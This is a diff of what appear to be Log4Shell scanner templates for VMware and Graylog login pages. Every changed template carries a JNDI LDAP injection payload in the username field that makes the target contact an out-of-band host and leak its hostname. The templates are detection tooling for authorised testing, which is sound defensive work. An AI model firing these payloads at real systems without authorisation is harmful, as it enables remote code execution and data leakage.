|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/31
|
# Enhanced by mp on 2022/05/31
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
|
|
||||||
{
|
{
|
||||||
"authType": "password",
|
"authType": "password",
|
||||||
"username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
|
"username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
|
||||||
"password": "admin"
|
"password": "admin"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -46,16 +50,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/05
|
# Enhanced by md on 2022/10/05
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/login.jsp
|
Referer: {{BaseURL}}/login.jsp
|
||||||
|
|
||||||
username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: location
|
part: location
|
||||||
|
@ -54,8 +58,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -33,7 +37,7 @@ http:
|
||||||
Sec-Fetch-Mode: cors
|
Sec-Fetch-Mode: cors
|
||||||
Sec-Fetch-Site: same-origin
|
Sec-Fetch-Site: same-origin
|
||||||
|
|
||||||
mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
|
mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -45,7 +49,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -57,8 +61,14 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
|
tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Origin: {{RootURL}}
|
Origin: {{RootURL}}
|
||||||
Referer: {{RootURL}}/ui/
|
Referer: {{RootURL}}/ui/
|
||||||
|
|
||||||
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
|
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -44,13 +48,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/05
|
# Enhanced by mp on 2022/04/05
|
||||||
|
|
Loading…
Reference in New Issue